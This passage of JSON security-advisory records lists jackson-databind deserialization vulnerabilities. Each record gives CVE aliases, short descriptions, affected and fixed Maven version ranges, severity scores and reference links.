of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. 
This was patched in 2.12.7.1, 2.13.4.2, and 2.14.0.\n\nCommits that introduced vulnerable code are \nhttps://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45, https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1, and https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc.\n\nFix commits are https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea and https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33.\n\nThe `2.13.4.1` release does fix this issue, however it also references a non-existent jackson-bom which causes build failures for gradle users. See https://github.com/FasterXML/jackson-databind/issues/3627#issuecomment-1277957548 for details. This is fixed in `2.13.4.2` which is listed in the advisory metadata so that users are not subjected to unnecessary build failures", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.4.0-rc1" }, { "fixed": "2.12.7.1" } ] } ], "versions": [ "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.5.1", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.6.1", "2.12.7", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", 
"2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.10.8", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-jjjh-jjxp-wpff/GHSA-jjjh-jjxp-wpff.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.13.0" }, { "fixed": "2.13.4.2" } ] } ], "versions": [ "2.13.0", "2.13.1", "2.13.2", "2.13.2.1", "2.13.2.2", "2.13.3", "2.13.4", "2.13.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-jjjh-jjxp-wpff/GHSA-jjjh-jjxp-wpff.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42003" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3590" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3627" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288" }, { "type": "WEB", "url": 
"https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5283" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221124-0004" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202210-21" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.13.4.1...jackson-databind-2.13.4.2" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commits/jackson-databind-2.4.0-rc1?after=75b97b8519f0d50c62523ad85170d80a197a2c86+174\u0026branch=jackson-databind-2.4.0-rc1\u0026qualified_name=refs%2Ftags%2Fjackson-databind-2.4.0-rc1" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/blob/2.13/release-notes/VERSION-2.x" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-10-04T21:55:46Z", "nvd_published_at": "2022-10-02T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-m6x4-97wx-4q27", "published": "2021-12-09T19:16:26Z", "modified": "2024-02-18T05:21:54.725837Z", "aliases": [ "CVE-2020-36184" ], "summary": "Unsafe Deserialization in jackson-databind", 
"details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-m6x4-97wx-4q27/GHSA-m6x4-97wx-4q27.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36184" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2998" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/567194c53ae91f0a14dc27239afb739b1c10448a" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:30:19Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mc6h-4qgp-37qh", "published": "2020-06-18T14:44:43Z", "modified": "2024-03-15T00:47:36.920636Z", "aliases": [ "CVE-2020-14195" ], "summary": "Deserialization of untrusted data in Jackson Databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, 
related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.5" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mc6h-4qgp-37qh/GHSA-mc6h-4qgp-37qh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14195" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2765" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200702-0003" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], 
"github_reviewed": true, "github_reviewed_at": "2020-06-18T13:05:45Z", "nvd_published_at": "2020-06-16T16:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mph4-vhrx-mv67", "published": "2019-07-05T21:07:27Z", "modified": "2024-03-15T01:16:21.467932Z", "aliases": [ "CVE-2019-12384" ], "summary": "Deserialization of Untrusted Data in FasterXML jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.9.1" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-mph4-vhrx-mv67/GHSA-mph4-vhrx-mv67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-mph4-vhrx-mv67/GHSA-mph4-vhrx-mv67.json" } }, { "package": { 
"name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.6" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-mph4-vhrx-mv67/GHSA-mph4-vhrx-mv67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-mph4-vhrx-mv67/GHSA-mph4-vhrx-mv67.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12384" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2334" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/c9ef4a10d6f6633cf470d6a469514b68fa2be234" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2019:1820" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef@%3Cdev.struts.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e0733058c0366b703e6757d8d2a7a04b943581f659e9c271f0841dfe@%3Cnotifications.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544" }, { "type": 
"WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190703-0002" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2720" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2936" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2937" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2938" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2998" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3292" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3297" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3901" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4352" }, { "type": "WEB", "url": "https://blog.doyensec.com/2019/07/22/jackson-gadgets.html" }, { "type": "WEB", "url": "https://doyensec.com/research.html" }, { "type": "PACKAGE", "url": 
"https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/74b90a4...a977aad" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9@%3Cdev.tomee.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-06-27T11:07:42Z", "nvd_published_at": "2019-06-24T16:15:15Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mx7p-6679-8g3q", "published": "2019-10-28T20:51:15Z", "modified": "2024-03-15T01:01:46.432481Z", "aliases": [ "CVE-2019-16942" ], "summary": "Polymorphic Typing in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. 
This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.1" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-mx7p-6679-8g3q/GHSA-mx7p-6679-8g3q.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-mx7p-6679-8g3q/GHSA-mx7p-6679-8g3q.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", 
"2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-mx7p-6679-8g3q/GHSA-mx7p-6679-8g3q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16942" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2478" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/328a0f833daf6baa443ac3b37c818a0204714b0b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/54aa38d87dcffa5ccc23e64922e9536c82c1b9c8" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bc67eb11a7cf57561f861ff16f879f1fceb5779f" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT" }, { "type": "WEB", "url": 
